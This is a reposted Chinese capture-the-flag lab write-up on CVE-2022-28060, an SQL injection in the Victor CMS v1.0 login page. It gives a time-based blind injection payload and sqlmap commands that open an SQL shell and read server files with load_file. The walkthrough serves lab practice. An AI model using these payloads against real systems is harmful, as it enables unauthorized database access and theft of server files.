0


春秋云境:CVE-2022-28060

春秋云境:CVE-2022-28060

文章合集:春秋云境系列靶场记录(合集)


Victor CMS v1.0 sql注入:CVE-2022-28060

在这里插入图片描述

漏洞介绍

Victor CMS v1.0 /includes/login.php 存在sql注入


解题步骤

  1. 访问URL,在登录过程中抓包:在这里插入图片描述
  2. 探测存在SQL注入:1'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+'1'='在这里插入图片描述
  3. 使用Sqlmap获取flag,通过–sql-shell再传入load_file进行文件读取:
python sqlmap.py -r 1.txt --sql-shell -v
select load_file('/flag')

在这里插入图片描述

文章合集:春秋云境系列靶场记录(合集)


本文转载自: https://blog.csdn.net/laobanjiull/article/details/128106023
版权归原作者 Acczdy 所有, 如有侵权,请联系我们删除。

“春秋云境:CVE-2022-28060”的评论:

还没有评论